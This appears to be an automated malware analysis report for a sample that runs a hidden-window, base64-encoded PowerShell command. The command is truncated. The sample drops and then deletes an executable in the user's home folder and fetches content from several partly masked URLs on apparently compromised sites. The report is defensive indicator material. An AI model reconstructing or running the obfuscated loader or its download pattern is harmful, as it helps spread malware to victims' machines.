Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAFMAVgBCAEUAaQBuAHQAPQAnAFIASABVAEYAUgBpAGQAdwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBDAFUAcgBJAFQAYAB5AHAAUgBvAFQAbwBjAG8AbAAiACAAPQAgAC...
Modifies file system
Creates the following files
- %HOMEPATH%\692.exe
Deletes the following files
- %HOMEPATH%\692.exe
Network activity
TCP
HTTP GET requests
- http://al####ital.co.uk/js/tCmXt/
- http://ju#####planphoto.com/wp-admin/kQdOa4UxK/
- http://ke####ameron.net/tesl/1igM48/
- http://ke####ameron.net/cgi-sys/suspendedpage.cgi
- http://km##sa.net/dlpR/
- http://me####lucoesti.com/UdgDD2851/
UDP
- DNS ASK al####ital.co.uk
- DNS ASK ju#####planphoto.com
- DNS ASK ke####ameron.net
- DNS ASK km##sa.net
- DNS ASK me####lucoesti.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAFMAVgBCAEUAaQBuAHQAPQAnAFIASABVAEYAUgBpAGQAdwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBDAFUAcgBJAFQAYAB5AHAAUgBvAFQAbwBjAG8AbAAiACAAPQAgAC...' (with hidden window)
